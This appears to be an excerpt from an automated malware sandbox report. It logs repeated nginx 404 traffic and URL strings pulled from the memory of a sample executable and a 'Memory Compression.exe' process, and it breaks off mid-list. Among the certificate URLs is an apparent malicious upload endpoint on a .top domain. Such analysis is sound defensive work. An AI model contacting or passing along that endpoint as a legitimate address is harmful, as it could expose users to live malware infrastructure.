                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: Memory Compression.exe, 00000025.00000002.1821172623.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://797441cm.n9shteam2.top
                          Source: Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://797441cm.n9shteam2.top/
                          Source: Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://797441cm.n9shteam2.top/Videouploads.php
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIN$Qw3
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digiN$Qw
                          Source: t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digiN$Qw3
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                          Source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digice
                          Source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digiceN$Qw3
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 